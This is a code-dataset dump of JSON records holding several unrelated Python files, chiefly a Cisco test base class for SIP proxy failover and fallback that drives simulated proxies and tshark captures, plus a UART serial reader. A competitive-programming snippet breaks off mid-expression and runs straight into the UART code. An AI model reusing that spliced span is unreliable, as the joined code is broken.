result.append(\"{0:-<80}\".format(\"-- {0} \".format(k)))\n \n for c in channels.values():\n result.append(\"{0:>20}: {1}\".format(c.type, [x.type for x in c.input_templates]))\n\n return '\\n'.join(result)\n","sub_path":"python/template/loader.py","file_name":"loader.py","file_ext":"py","file_size_in_byte":4136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"295161672","text":"n,m = map(int,input().split())\nlist1=list(map(int, input().strip().split(' ')))\nlist2=list(map(int, input().strip().split(' ')))\nlist1.sort(reverse=True)\n\n\ncount = 0\nfor i in range(n):\n for j in range(m):\n if list1[i]==list2[j]or list1[i] 0:\n\t\tout += ser.read(1)\n\treturn out.decode(\"utf-8\")\n\n\nif __name__ == \"__main__\":\n\ttry:\n\t\tfile_object = open('text.txt', 'w')\n\t\tb = b''\n\t\tser.open()\n\t\tser.flushInput()\n\t\tser.flushOutput()\n\t\tprint ('Hello')\n\t\tcounter = 0;\n\t\twhile (1):\n\t\t\t# uart_write()\n\t\t\tb = uart_read()\n\t\t\tb = b.strip()\n\t\t\t#print (b)\n\t\t\tif (len(b) > 2):\n\t\t\t\t#counter += 1\n\t\t\t\tcounter = b[6:9]\n\t\t\t\tb = b[1:5]\n\t\t\t\tfile_object.write('{0}\\n'.format(b))\n\t\t\t\tprint(\"{1}:{0}\".format(b,counter))\n\t\tser.close()\n\texcept Exception as e:\n\t\tprint (e)\n\tfinally:\n\t\tfile_object.close()\n\t\tser.close()\n","sub_path":"uartreader/uartreader_filesave.py","file_name":"uartreader_filesave.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"20"} +{"seq_id":"612228326","text":"#!/usr/bin/env python\n\"\"\"\nScript Header\n\n$Id: cmSG_3pcc_failover_fallback_base.py\n\nCopyright (c) 2016-2017 Cisco Systems, Inc.\n\nNotes:\n Basic APIs for failover and fallback feature\n\nAuthor:\n Yue Yu(yueyu@cisco.com)\n\nKnown bugs:\n\n\"\"\"\n\nimport logging\nimport csv\nimport time\nfrom os.path import dirname, realpath\nfrom os.path import join as p_join\nimport collections\nimport re\nimport tng\nfrom ConfigParser import NoSectionError\nfrom tng.base_errors import TngError\nfrom tng.frontend.timing import wait, until\nfrom tng_sl.contrib.mpp.phone_config_helper import PhoneConfigHelper\nfrom tng_sl.contrib.mpp.broadsoft_login_helper import BroadsoftLoginHelper\nfrom tng_sl.contrib.mpp.tshark_helper import TsharkHelper\nfrom tng_sl.device.endpoint.synergylite.synergylite_3pcc_extended import (\n wait_for_ccapi_call_states)\nfrom tng_sl.contrib.mpp.broadsoft.broadsoft_config import BroadsoftConfig\nfrom tng_sl.contrib.mpp.Toolkit3pcc import Toolkit3pcc\nlog = logging.getLogger('FOFBBaseClass')\n\n\ndef test(self):\n log.info(\"Start of running case\")\n self.run_each_case(self.sip_transport)\n if self.sip_method == 'register':\n self.analyse_tshark_capture_reg(self.sip_transport)\n else:\n self.analyse_tshark_capture_other(self.sip_transport)\n log.info(\"End of running case\")\n\n\nclass FOFBBaseClass(object):\n helpers = (PhoneConfigHelper, BroadsoftLoginHelper, TsharkHelper)\n helper_num_devices = 1\n reg_expires = 60\n # change fallback time smaller to make phone fall back earlier\n # otherwise invite case cannot pass\n fallback_time = 27\n sip_timer_F = 16\n sip_timer_B = 16\n long_retry = 1200\n short_retry = 1200\n key_file_tls = None\n cert_file_tls = None\n custom_CA = ''\n sip_port = '5060'\n sip_contacts = None\n # subscribe related parameters\n sub_type = 'feature_key_sync'\n feature_key_sync = '0'\n hoteling = '0'\n blf_listUri = ''\n blf_use_line = '0'\n blf_expires = '1800'\n share_call_appearance = 
'private'\n share_ext = '0'\n ignore_tcp_seq = '-o tcp.analyze_sequence_numbers:false'\n\n @classmethod\n def set_tests_on_class(cls):\n cls.toolkit = Toolkit3pcc()\n cls.FOFB_file_tls = 'FOFBcases_tls_sanity.csv'\n cls.FOFB_file = 'FOFBcases_sanity.csv'\n try:\n if cls.toolkit.get_test_env_info(\n section='fofb',\n parameter_name='test_mode') == 'regression':\n cls.FOFB_file_tls = 'FOFBcases_tls.csv'\n cls.FOFB_file = 'FOFBcases.csv'\n log.info(\"Running Regression FOFB test cases\")\n except NoSectionError:\n log.debug(\"config file {} did not contain [fofb] section\".format(\n cls.toolkit.get_env_full_path()), exc_info=True)\n\n # CASE_NO_TOTAL is the total test cases number\n # use number of lines of the csv file, avoid blank line in the file\n if cls.sip_transport == 'TLS':\n config_file = cls.FOFB_file_tls\n else:\n config_file = cls.FOFB_file\n with open(p_join(dirname(realpath(\n __file__)), '..', '..', 'data', 'FOFB_conf',\n config_file)) as tcfile:\n CASE_NO_TOTAL = len(tcfile.readlines()) - 1\n # add a unique test case name for each item in the file\n for i in range(1, CASE_NO_TOTAL + 1):\n test_name = 'test_{:0>3}'.format(i)\n log.debug(\"cls: %s, test: %s -> %r\", cls, test_name, test)\n setattr(cls, 'test_{:0>3}'.format(i), test)\n\n @classmethod\n def setUpClass(cls):\n log.info('Start of setUpClass')\n cls.origin_proxy = cls.toolkit.get_test_env_info(\n section='phone', parameter_name=\"proxy\")\n cls.time_to_wait_capture = cls.reg_expires\n cls.dns_data = cls.toolkit.get_test_env_info(section='dns')\n cls.bsoft_data = cls.toolkit.get_test_env_info(section='bsoft')\n cls.fofb_data = cls.toolkit.get_test_env_info(section='fofb')\n cls.dns_device = tng.api.get_system('dns1')\n cls.primary_dns = cls.dns_device.get_ip()\n cls.user_id = cls.phone_data['userID1']\n cls.user_id_blf = cls.phone_data['userID2']\n cls.proxy_blf = cls.phone_data['proxy_srv1']\n cls.proxy_srv = cls.phone_data['proxy_srv2']\n cls.custom_CA = cls.fofb_data['custom_ca_fofb']\n cls.secondary_proxy = cls.bsoft_data['as_ip_addr']\n cls.secondary_proxy6 = cls.bsoft_data['as_ip_addr6']\n cls.simp_device = tng.api.get_system('simproxy')\n cls.simp6_device = tng.api.get_system('simproxy6')\n cls.simproxy = cls.simp_device.get_ip()\n cls.simproxy6 = cls.simp6_device.get_ip()\n cls.phone_ipaddr = cls.oPhone1.ui.get_param_value('Current IP')\n cls.phone_ipaddr6 = cls.oPhone1.ui.get_param_value('Current IP_IPV6')\n # For TLS, use simporxy2nd to simulate second proxy\n # since BS does not support TLS\n cls.simp2nd_device = tng.api.get_system('simproxy2nd')\n cls.simp2nd6_device = tng.api.get_system('simproxy2nd6')\n cls.simproxy2nd = cls.simp2nd_device.get_ip()\n cls.simproxy2nd6 = cls.simp2nd6_device.get_ip()\n cls.oPhone1.model = cls.oPhone1.ui.get_param_value('Product Name')\n\n if cls.sip_transport != 'TLS':\n cls.custom_CA = ''\n\n # configure broadsoft server\n def CleanupBsAfterAllCases():\n log.info('change domain on broadsoft server')\n cls.bsoft_web.change_device_domain(\n 'group admin', cls.user_id, cls.origin_proxy)\n cls.addCleanupClass(CleanupBsAfterAllCases)\n\n cls.bsoft_web.change_device_domain(\n 'group admin', cls.user_id, cls.proxy_srv)\n\n # config blf, user_id monitor user_id_blf\n if cls.sub_type == 'blf':\n log.info('set blf list uri on broadsoft server')\n cls.broadsoft = BroadsoftConfig()\n cls.blf_listUri = '{}_listUri@{}'.format(\n cls.user_id, cls.proxy_srv)\n cls.xsi_user = '{}@{}'.format(cls.user_id, cls.proxy_blf)\n\n def CleanupBlfAfterAllCases():\n log.info(\"clear blf list uri on 
broadsoft server\")\n cls.broadsoft.set_busy_lamp_field(\n list_uri=cls.blf_listUri, blf_monitored_user_id=[],\n user_id_proxy=cls.xsi_user, user_id=cls.user_id)\n cls.addCleanupClass(CleanupBlfAfterAllCases)\n\n cls.broadsoft.set_busy_lamp_field(\n list_uri=cls.blf_listUri,\n blf_monitored_user_id=['{}@{}'.format(\n cls.user_id_blf, cls.proxy_blf)],\n user_id_proxy=cls.xsi_user, user_id=cls.user_id)\n\n # config hoteling\n elif cls.sub_type == 'hoteling':\n log.info(\"Enable hoteling on broadsoft server\")\n\n def CleanupHtlAfterAllCases():\n log.info(\"Disable hoteling on broadsoft server\")\n cls.bsoft_web.disable_hoteling_host(\n account_type=\"group admin\", user_phone_num=cls.user_id)\n cls.addCleanupClass(CleanupHtlAfterAllCases)\n\n cls.bsoft_web.enable_hoteling_host(\n account_type=\"group admin\", user_phone_num=cls.user_id)\n\n # config share line\n elif cls.sub_type == 'shareline':\n log.info(\"Add shared line on broadsoft server\")\n model_pattern = re.compile('-(\\d{4}).*-')\n re_result = model_pattern.search(cls.oPhone1.model)\n if not re_result:\n raise TngError(\n \"Unable to get phone1's model number from string %r.\" %\n cls.oPhone1.model)\n model_number = re_result.group(1)\n bsoft_phone1_model = 'Cisco-Hybrid-{}'.format(model_number)\n cls.phone1_sharedId1 = cls.user_id + '_' + str(int(time.time()))\n\n def CleanupScaAfterAllCases():\n log.info(\"clear share line on broadsoft server\")\n if hasattr(cls, 'phone1_sharedName1'):\n cls.bsoft_web.delete_shared_line(\n cls.user_id, cls.phone1_sharedName1,\n account_type='user')\n cls.addCleanupClass(CleanupScaAfterAllCases)\n\n cls.phone1_sharedName1 = cls.bsoft_web.configure_shared_line(\n cls.phone1_sharedId1, bsoft_phone1_model, cls.user_id,\n account_type='group admin', proxy=cls.proxy_srv)\n\n def CleanupAfterAllCases():\n cls.oPhone1.ui.set_web_parameter_http(\n BLF_List=['Att Console', 'BLF List URI', ''],\n Debug_Level=['System', 'Debug Level', 'NOTICE'],\n IP_Mode=['System', 'IP Mode', 'Dual Mode'],\n Custom_CA=['Provisioning', 'Custom CA Rule', ''])\n cls.check_phone_settings(\n cls.oPhone1,\n IP_Mode=['IP_Mode', 'Dual Mode'])\n cls.addCleanupClass(CleanupAfterAllCases)\n\n # set proxy empty to make sure no register message at first\n cls.oPhone1.ui.set_web_parameter_http(\n SIP_Timer_F=['SIP', 'SIP Timer F', cls.sip_timer_F],\n SIP_Timer_B=['SIP', 'SIP Timer B', cls.sip_timer_B],\n SIP_Long_Retry=['SIP', 'Reg Retry Long Intvl', cls.long_retry],\n SIP_Short_Retry=['SIP', 'Reg Retry Intvl', cls.short_retry],\n Proxy=['Ext 1', 'Proxy', ''],\n UserId=['Ext 1', 'User ID', cls.user_id],\n Reg_Expires=['Ext 1', 'Register Expires', cls.reg_expires],\n Fallback_Time=['Ext 1', 'Proxy Fallback Intvl', cls.fallback_time],\n Outbound_Proxy=['Ext 1', 'Outbound Proxy', ''],\n TLS_Name_Validate=['Ext 1', 'TLS Name Validate', 0],\n IP_Mode=['System', 'IP Mode', 'Dual Mode'],\n Custom_CA=['Provisioning', 'Custom CA Rule', cls.custom_CA],\n Debug_Level=['System', 'Debug Level', 'DEBUG'],\n BLF_List=['Att Console', 'BLF List URI', cls.blf_listUri],\n BLF_Expires=['Att Console', 'Subscribe Expires', cls.blf_expires],\n DNS_SRV=['Ext 1', 'Use DNS SRV', 1],\n DNS_SRV_Prefix=['Ext 1', 'DNS SRV Auto Prefix', 1],\n DNS_Order=['System', 'DNS Server Order', 'Manual'],\n DNS_Query_Mode=['System', 'DNS Query Mode', 'Parallel'],\n DNS_Primary=['System', 'Primary DNS', cls.primary_dns])\n\n # check phone configuration\n cls.check_phone_settings(\n cls.oPhone1,\n SIP_Timer_F=['SIP_Timer_F', str(cls.sip_timer_F)],\n SIP_Timer_B=['SIP_Timer_B', 
str(cls.sip_timer_B)],\n SIP_Long_Retry=['Reg_Retry_Long_Intvl', str(cls.long_retry)],\n SIP_Short_Retry=['Reg_Retry_Intvl', str(cls.short_retry)],\n Proxy=['Proxy_1_', None],\n UserId=['User_ID_1_', cls.user_id],\n Reg_Expires=['Register_Expires_1_', str(cls.reg_expires)],\n Fallback_Time=['Proxy_Fallback_Intvl_1_', str(cls.fallback_time)],\n Outbound_Proxy=['Outbound_Proxy_1_', None],\n IP_Mode=['IP_Mode', 'Dual Mode'],\n DNS_SRV=['Use_DNS_SRV_1_', 'Yes'],\n DNS_SRV_Prefix=['DNS_SRV_Auto_Prefix_1_', 'Yes'],\n DNS_Order=['DNS_Server_Order', 'Manual'],\n DNS_Query_Mode=['DNS_Query_Mode', 'Parallel'],\n DNS_Primary=['Primary_DNS', cls.primary_dns])\n # get phone's configurations from csv file\n cls.deq = cls.read_from_csv(cls.sip_transport)\n\n log.info('End of setUpClass')\n\n def setUp(self):\n log.info(\"Start of setup for case\")\n if self.sub_type == 'blf':\n linenum = self.oPhone1.get_phone_line_total_number()\n if linenum <= 1:\n self.skipTest(\"Phone only has one line, it can't be set BLF\")\n\n def CleanupAfterEachCase():\n # clean proxy and outbound proxy\n # to make sure the phone stops sending register messages\n log.info(\"Start of cleanup after each case\")\n self.oPhone1.phone_set_idle()\n self.oPhone1.ui.set_web_parameter_http(\n Proxy=['Ext 1', 'Proxy', ''],\n Outbound_Proxy=['Ext 1', 'Outbound Proxy', ''])\n self.check_phone_settings(\n self.oPhone1,\n Proxy=['Proxy_1_', None],\n Outbound_Proxy=['Outbound_Proxy_1_', None])\n\n # close simproxy subprocess\n if self.try_backup_rsc and self.sip_method == 'register' or (\n self.sip_method != 'register' and self.expect_msg != []):\n self.close_simproxy('simproxy.py', self.simp_device)\n self.close_simproxy('simproxyv6.py', self.simp6_device)\n if self.sip_transport == 'TLS' and self.expect_msg != []:\n self.close_simproxy('simproxy.py', self.simp2nd_device)\n self.close_simproxy('simproxyv6.py', self.simp2nd6_device)\n log.info(\"End of cleanup after each case\")\n\n self.addCleanup(CleanupAfterEachCase)\n log.info(\"End of setup for case\")\n\n # read different configurations for each case from csv file\n @classmethod\n def read_from_csv(cls, sip_transport):\n log.info('Start to read from csv')\n file_path = dirname(realpath(__file__))\n deq = collections.deque()\n if sip_transport == 'TLS':\n file_name = (\n file_path + '/../../data/FOFB_conf/' +\n cls.FOFB_file_tls)\n else:\n file_name = (\n file_path + '/../../data/FOFB_conf/' +\n cls.FOFB_file)\n with open(file_name) as testcases:\n reader = csv.DictReader(testcases)\n deq.extend(reader)\n log.info('End to read from csv')\n return deq\n\n @staticmethod\n def check_phone_settings(phone, **kwargs):\n for name, expected_value in kwargs.values():\n actual_value = phone.get_web_config(\n name)[0]\n # note: asserting a (condition, message) tuple is always true,\n # so the message must be the assert's second operand\n assert actual_value == expected_value, (\n 'Check parameter:{}: Expected: {!r} Actual: {!r}'.format(\n name, expected_value, actual_value))\n\n # only '1' or '0' or '' is accepted for configuring parameters\n # change to Yes or No or None for checking accordingly\n def convert_set_value_for_check(self, value):\n if value == '1':\n return 'Yes'\n elif value == '0':\n return 'No'\n elif value == '':\n return None\n return value\n\n # check that the destination IP address of the SIP message is correct\n def check_sip_reg_dst(self, reg_msg, dst_ip):\n log.info(\"Start to check register destination\")\n if ':' in dst_ip:\n reg_rsc = self.tshark.omd_get_attr(reg_msg, \"ipv6.dst\")\n else:\n reg_rsc = self.tshark.omd_get_attr(reg_msg, \"ip.dst\")\n self.assertEqual(reg_rsc[0], dst_ip, \"Destination ip 
address is wrong\")\n\n # check whether fallback time is correct\n def check_fallback_time(self, msg1, msg2, msg3, transport='UDP'):\n log.info(\"Start to check fallback time\")\n time_frame_1 = self.tshark.omd_get_attr(\n msg1, 'frame.time_epoch')[0]\n time_frame_2 = self.tshark.omd_get_attr(\n msg2, 'frame.time_epoch')[0]\n time_frame_3 = self.tshark.omd_get_attr(\n msg3, 'frame.time_epoch')[0]\n if transport == 'UDP':\n failover_time = int(float(time_frame_2) - float(time_frame_1))\n fallback_time = int(float(time_frame_3) - float(time_frame_2))\n log.info('fallback_time is {}'.format(fallback_time))\n log.info('failover is {}'.format(failover_time))\n reg_expire_tmp = self.reg_expires - failover_time\n reg_timeout = reg_expire_tmp - (reg_expire_tmp * 7) / pow(2, 5)\n log.info('reg_time is {}'.format(reg_timeout))\n self.assertAlmostEqual(reg_timeout, fallback_time, delta=1)\n else:\n fallback_time = int(float(time_frame_2) - float(time_frame_1))\n register_expire = int(float(time_frame_3) - float(time_frame_1))\n log.info('fallback time is {} and register expire is {}'.format(\n fallback_time, register_expire))\n self.assertAlmostEqual(fallback_time, self.fallback_time, delta=1)\n if self.sip_method == 'register' and not self.try_backup_rsc:\n self.assertAlmostEqual(\n register_expire, self.reg_expires * 0.78, delta=2)\n elif self.try_backup_rsc and transport != 'TLS':\n self.assertAlmostEqual(\n register_expire, self.fallback_time, delta=2)\n log.info(\"Check fallback time end\")\n\n # start simproxy to simulate proxy\n def start_simproxy(\n self, simp_device, simp_file, svrip, svrport,\n sip_method='register', try_backup_rsc='200',\n sip_transport='UDP', key=None, cert=None, contacts=None):\n log.info(\"Start simproxy to do the testing\")\n simproxy_cmd = (\n \"python {} -i {} -p {} -u {} -r {} -t {} -k {} -c {} -s {}\".format(\n simp_file, svrip, svrport, sip_method, try_backup_rsc,\n sip_transport, key, cert, contacts))\n try:\n log.info(\"simproxy command is {}\".format(simproxy_cmd))\n simp_device.ssh.start_command(simproxy_cmd)\n except Exception:\n log.error(\"cannot start simproxy\", exc_info=True)\n\n # close simproxy subprocess\n def close_simproxy(self, simp_file, simp_device):\n log.info(\"Killing simproxy subprocess via pid\")\n pid_cmd = 'ps -ef|grep \"python {}\"'.format(simp_file)\n pid = re.match('.*? 
+(\\d+)', simp_device.ssh.get_command_output(\n pid_cmd)).group(1)\n kill_cmd = \"kill \" + format(pid)\n try:\n simp_device.ssh.get_command_output(kill_cmd)\n except Exception:\n log.error(\"cannot kill simproxy\", exc_info=True)\n\n def verify_uut_ipv6_addr(self, param):\n ipv6_addr = self.oPhone1.ui.get_param_value(param)\n return ipv6_addr != '::' and ipv6_addr != ''\n\n # run each test case according to different configurations\n def run_each_case(self, sip_transport):\n log.info(\"Start of run each test case\")\n expected_sip_flow = ''\n self.expect_msg = []\n # read different configurations for each case from csv file\n row = self.deq.popleft()\n log.info(\"row is {}\".format(row))\n self.auto_register = row['Auto register when failover']\n self.ip_mode = row['IP Mode']\n self.sip_preference = row['SIP IP Preference']\n self.proxy = row['Proxy']\n if sip_transport == 'TLS':\n self.proxy = self.proxy.format(\n IP1=self.simproxy, IP2=self.simproxy2nd)\n else:\n self.proxy = self.proxy.format(\n IP1=self.simproxy, IP2=self.secondary_proxy)\n log.info(\"proxy is {}\".format(self.proxy))\n self.outbound_proxy = row['Outbound Proxy']\n if sip_transport == 'TLS':\n self.outbound_proxy = self.outbound_proxy.format(\n IP1=self.simproxy, IP2=self.simproxy2nd)\n else:\n self.outbound_proxy = self.outbound_proxy.format(\n IP1=self.simproxy, IP2=self.secondary_proxy)\n log.info(\"outbound proxy is {}\".format(self.outbound_proxy))\n self.use_dns_srv = row['Use DNS SRV']\n self.dns_srv_auto_prefix = row['DNS SRV Auto Prefix']\n self.try_backup_rsc = row['Try Backup RSC']\n if sip_transport == 'UDP' and self.sip_method == 'register':\n expected_sip_flow = row['Expected sip flow for reg udp']\n elif sip_transport == 'TCP' and self.sip_method == 'register':\n expected_sip_flow = row['Expected sip flow for reg tcp']\n elif sip_transport == 'UDP' and self.sip_method == 'invite':\n expected_sip_flow = row['Expected sip flow for inv udp']\n elif sip_transport == 'TCP' and self.sip_method == 'invite':\n expected_sip_flow = row['Expected sip flow for inv tcp']\n elif sip_transport == 'UDP' and self.sip_method == 're-invite-hold':\n expected_sip_flow = row['Expected sip flow for reinv udp']\n elif sip_transport == 'TCP' and self.sip_method == 're-invite-hold':\n expected_sip_flow = row['Expected sip flow for reinv tcp']\n elif sip_transport == 'UDP' and self.sip_method == 'bye':\n expected_sip_flow = row['Expected sip flow for bye udp']\n elif sip_transport == 'TCP' and self.sip_method == 'bye':\n expected_sip_flow = row['Expected sip flow for bye tcp']\n elif sip_transport == 'UDP' and self.sip_method == 'subscribe':\n expected_sip_flow = row['Expected sip flow for sub udp']\n elif sip_transport == 'TCP' and self.sip_method == 'subscribe':\n expected_sip_flow = row['Expected sip flow for sub tcp']\n elif sip_transport == 'TLS':\n if self.sip_method == 'bye' or self.sip_method == 're-invite-hold':\n expected_sip_flow = row['Expected sip flow for tls']\n else:\n expected_sip_flow = 'tls'\n log.info(\"expect flow is {}\".format(expected_sip_flow))\n if expected_sip_flow == '':\n self.skipTest(\"Skip cases for bye and reinvite if auto reg is yes\")\n # change value for expected_sip_flow to list format\n self.expect_msg.extend(expected_sip_flow.split())\n # start Tshark to capture packets\n log.info('Start tshark on linux')\n if self.ip_mode == 'IPv6 Only':\n filter_cmd = (\n 'host {}'.format(self.phone_ipaddr6))\n elif self.ip_mode == 'IPv4 Only':\n filter_cmd = (\n 'host {}'.format(self.phone_ipaddr))\n 
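# Dual Mode: wait until the phone reports a global IPv6 address, then capture on both IP stacks\n 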
else:\n until(\n self.verify_uut_ipv6_addr,\n args=('Current IP_IPV6', ),\n timeout=30,\n raise_msg='Timeout, Cannot get ipv6 address of oPhone1')\n filter_cmd = 'host {} or host {}'.format(\n self.phone_ipaddr,\n self.phone_ipaddr6)\n self.capture_file = self.tshark.tshark_start(filter_cmd)\n # open simproxy to simulate primary proxy for IPv4\n # open simproxy6 to simulate primary proxy for IPv6\n response_code = self.try_backup_rsc or '0'\n if self.try_backup_rsc or self.sip_method != 'register':\n self.start_simproxy(\n self.simp_device, 'simproxy.py', self.simproxy, self.sip_port,\n self.sip_method, response_code, sip_transport,\n self.key_file_tls, self.cert_file_tls, self.sip_contacts)\n self.start_simproxy(\n self.simp6_device, 'simproxyv6.py', self.simproxy6,\n self.sip_port, self.sip_method, response_code, sip_transport,\n self.key_file_tls, self.cert_file_tls, self.sip_contacts)\n else:\n log.info(\"No need to start simproxy\")\n if sip_transport == 'TLS':\n self.start_simproxy(\n self.simp2nd_device, 'simproxy.py', self.simproxy2nd,\n self.sip_port, self.sip_method, '200', sip_transport,\n self.key_file_tls, self.cert_file_tls, self.sip_contacts)\n self.start_simproxy(\n self.simp2nd6_device, 'simproxyv6.py', self.simproxy2nd6,\n self.sip_port, self.sip_method, '200', sip_transport,\n self.key_file_tls, self.cert_file_tls, self.sip_contacts)\n\n # set parameters to the values gotten from csv file\n self.oPhone1.ui.set_web_parameter_http(\n Proxy=['Ext 1', 'Proxy', self.proxy],\n Auto_Reg=[\n 'Ext 1', 'Auto Register When Failover', self.auto_register],\n SIP_Preference=['SIP', 'SIP IP Preference', self.sip_preference],\n Try_Backup_RSC=['SIP', 'Try Backup RSC', self.try_backup_rsc],\n IP_Mode=['System', 'IP Mode', self.ip_mode],\n Outbound_Proxy=['Ext 1', 'Outbound Proxy', self.outbound_proxy],\n Share_Call_Appearance=[\n 'Phone', 'Line Key 1', 'Share Call Appearance',\n self.share_call_appearance],\n Share_Ext=['Ext 1', 'Share Ext', self.share_ext],\n Feature_Key_Sync=[\n 'Ext 1', 'Feature Key Sync', self.feature_key_sync],\n Hoteling=['Ext 1', 'Enable Broadsoft Hoteling', self.hoteling],\n BLF_Use_Line=[\n 'Att Console', 'Use Line Keys For BLF List',\n self.blf_use_line],\n SIP_Transport=['Ext 1', 'SIP Transport', sip_transport],\n DNS_SRV=['Ext 1', 'Use DNS SRV', self.use_dns_srv],\n DNS_SRV_Prefix=[\n 'Ext 1', 'DNS SRV Auto Prefix', self.dns_srv_auto_prefix])\n\n proxy_check = self.convert_set_value_for_check(self.proxy)\n auto_register_check = self.convert_set_value_for_check(\n self.auto_register)\n try_backup_rsc_check = self.convert_set_value_for_check(\n self.try_backup_rsc)\n outbound_proxy_check = self.convert_set_value_for_check(\n self.outbound_proxy)\n use_dns_srv_check = self.convert_set_value_for_check(self.use_dns_srv)\n dns_srv_auto_prefix_check = self.convert_set_value_for_check(\n self.dns_srv_auto_prefix)\n feature_key_sync_check = self.convert_set_value_for_check(\n self.feature_key_sync)\n hoteling_check = self.convert_set_value_for_check(self.hoteling)\n blf_use_line_check = self.convert_set_value_for_check(\n self.blf_use_line)\n share_ext_check = self.convert_set_value_for_check(self.share_ext)\n\n self.check_phone_settings(\n self.oPhone1,\n Proxy=['Proxy_1_', proxy_check],\n Auto_Reg=['Auto_Register_When_Failover_1_', auto_register_check],\n SIP_Preference=['SIP_IP_Preference', self.sip_preference],\n Try_Backup_RSC=['Try_Backup_RSC', try_backup_rsc_check],\n IP_Mode=['IP_Mode', self.ip_mode],\n Outbound_Proxy=['Outbound_Proxy_1_', 
outbound_proxy_check],\n Share_Call_Appearance=[\n 'Share_Call_Appearance_1_', self.share_call_appearance],\n Share_Ext=['Share_Ext_1_', share_ext_check],\n Feature_Key_Sync=['Feature_Key_Sync_1_', feature_key_sync_check],\n Hoteling=['Enable_Broadsoft_Hoteling_1_', hoteling_check],\n SIP_Transport=['SIP_Transport_1_', sip_transport],\n DNS_SRV=['Use_DNS_SRV_1_', use_dns_srv_check],\n DNS_SRV_Prefix=[\n 'DNS_SRV_Auto_Prefix_1_', dns_srv_auto_prefix_check])\n\n # make sure the phone can fallback to the 1st server\n if not self.try_backup_rsc:\n if (sip_transport == 'UDP' and self.sip_method == 'register') or (\n self.sub_type == 'blf') or (\n self.auto_register == '1' and self.sip_method == 'invite'):\n self.time_to_wait_capture = (\n self.time_to_wait_capture + self.sip_timer_F)\n if self.ip_mode == 'Dual Mode':\n self.time_to_wait_capture = (\n self.time_to_wait_capture +\n self.sip_timer_F)\n if self.sip_method == 'invite' or self.sip_method == 'bye' or (\n self.sip_method == 're-invite-hold'):\n self.oPhone1.ccapi.dial('NULL', '123', '', 1, 0, 1)\n wait_for_ccapi_call_states(\n [self.oPhone1], [\"CONNECTED\"], timeout=40)\n if self.sip_method == 're-invite-hold':\n self.oPhone1.ccapi.hold('0000')\n if self.sip_transport == 'TLS':\n wait_for_ccapi_call_states(\n [self.oPhone1], [\"HOLD\"], timeout=20)\n self.oPhone1.ccapi.hangUp('0000')\n else:\n self.oPhone1.ccapi.hangUp('0000')\n wait(self.time_to_wait_capture, 'Until fallback to the 1st server')\n # change time_to_wait_capture back to register expire\n self.time_to_wait_capture = self.reg_expires\n log.info('Stop Tshark on Linux')\n self.tshark.tshark_stop()\n log.info(\"End of run each test case\")\n\n # get frame number of sip message for TLS protocol\n def get_frame_number_tls(self, phone_ip, simproxy):\n if ':' in phone_ip:\n filter_reg_ok = (\n 'tcp && !(tcp.port==80) && (ipv6.dst == ' +\n phone_ip + ') && (ipv6.src == ' +\n simproxy + ') && (ssl.record.content_type == 23)')\n else:\n filter_reg_ok = (\n 'tcp && !(tcp.port==80) && (ip.dst == ' +\n phone_ip + ') && (ip.src == ' +\n simproxy + ') && (ssl.record.content_type == 23)')\n self.msg_reg_ok = self.tshark.omd_read(\n self.capture_file, filter_reg_ok)\n frame_number = self.tshark.omd_get_attr(\n self.msg_reg_ok[0], \"frame.number\")[0]\n return frame_number\n\n # get TCP connection for TCP and TLS\n def get_tcp_connection(self, frame_number, phone_ip, server_ip, number):\n if number == '1':\n if ':' in phone_ip:\n if self.sip_method == 'register':\n filter1 = (\n 'tcp && !(sip) && (frame.number <= ' + frame_number +\n ') && (ipv6.src == ' + phone_ip +\n ') && (ipv6.dst == ' + server_ip +\n ') && !(tcp.srcport==80)&&(tcp.flags.syn==1)')\n else:\n filter1 = (\n 'tcp && !(sip) && (frame.number <= ' + frame_number +\n ') && (ipv6.src == ' + phone_ip +\n ') && (ipv6.dst == ' + server_ip +\n ') && !(tcp.srcport==80)&&(tcp.flags.fin==1)')\n return self.tshark.omd_read(self.capture_file, filter1)\n else:\n if self.sip_method == 'register':\n filter1 = (\n 'tcp && !(sip) && (frame.number <= ' + frame_number +\n ') && (ip.src == ' + phone_ip +\n ') && (ip.dst == ' + server_ip +\n ') && !(tcp.srcport==80)&&(tcp.flags.syn==1)')\n else:\n filter1 = (\n 'tcp && !(sip) && (frame.number <= ' + frame_number +\n ') && (ip.src == ' + phone_ip +\n ') && (ip.dst == ' + server_ip +\n ') && !(tcp.srcport==80)&&(tcp.flags.fin==1)')\n return self.tshark.omd_read(self.capture_file, filter1)\n\n # after fallback time, re-establish tcp connection\n elif number == '2':\n if ':' in phone_ip:\n filter1_2 
= (\n 'tcp && !(sip) && (frame.number >= ' + frame_number +\n ') && (ipv6.src == ' + phone_ip +\n ') && (ipv6.dst == ' + server_ip +\n ') && !(tcp.srcport==80)&&(tcp.flags.syn==1)')\n return self.tshark.omd_read(self.capture_file, filter1_2)\n else:\n filter1_2 = (\n 'tcp && !(sip) && (frame.number >= ' + frame_number +\n ') && (ip.src == ' + phone_ip +\n ') && (ip.dst == ' + server_ip +\n ') && !(tcp.srcport==80)&&(tcp.flags.syn==1)')\n return self.tshark.omd_read(self.capture_file, filter1_2)\n\n # analyse the sniffer for register destination and fallback time\n # for Dual mode, the 1st and 2nd register are sent to simproxy\n # for IPv4 or IPv6 only mode, only the 1st register is sent to simproxy\n # the register which response is 200ok is sent to secondary proxy\n def analyse_tshark_capture_reg(self, sip_transport):\n log.info(\"Start to analyse tshark packet\")\n # get index of 200Ok to register to the secondary proxy\n if sip_transport.upper() in ['UDP', 'TCP']:\n packets = self.tshark.omd_read(\n self.capture_file, filter='sip',\n other_args=self.ignore_tcp_seq)\n log.info(\"expected msgs are {}\".format(self.expect_msg))\n msgs = self.tshark.omd_check_sip_msgs(packets, self.expect_msg)\n self.index_200 = self.expect_msg.index('200')\n if sip_transport == 'UDP':\n self.index_2nd_reg = self.expect_msg.index('register', 1)\n elif sip_transport == 'TCP':\n self.frame_number = self.tshark.omd_get_attr(\n packets[self.index_200], \"frame.number\")[0]\n # for IPv6, the first registration destination is simproxy6\n # for IPv4, the first registration destination is simproxy\n if self.sip_preference == 'IPv6':\n log.info(\"IPv6, first reg send to simproxy6\")\n if sip_transport.upper() in ['UDP', 'TCP']:\n self.check_sip_reg_dst(\n msgs[self.index_200-1], self.secondary_proxy6)\n else:\n self.frame_number = self.get_frame_number_tls(\n self.phone_ipaddr6, self.simproxy2nd6)\n if 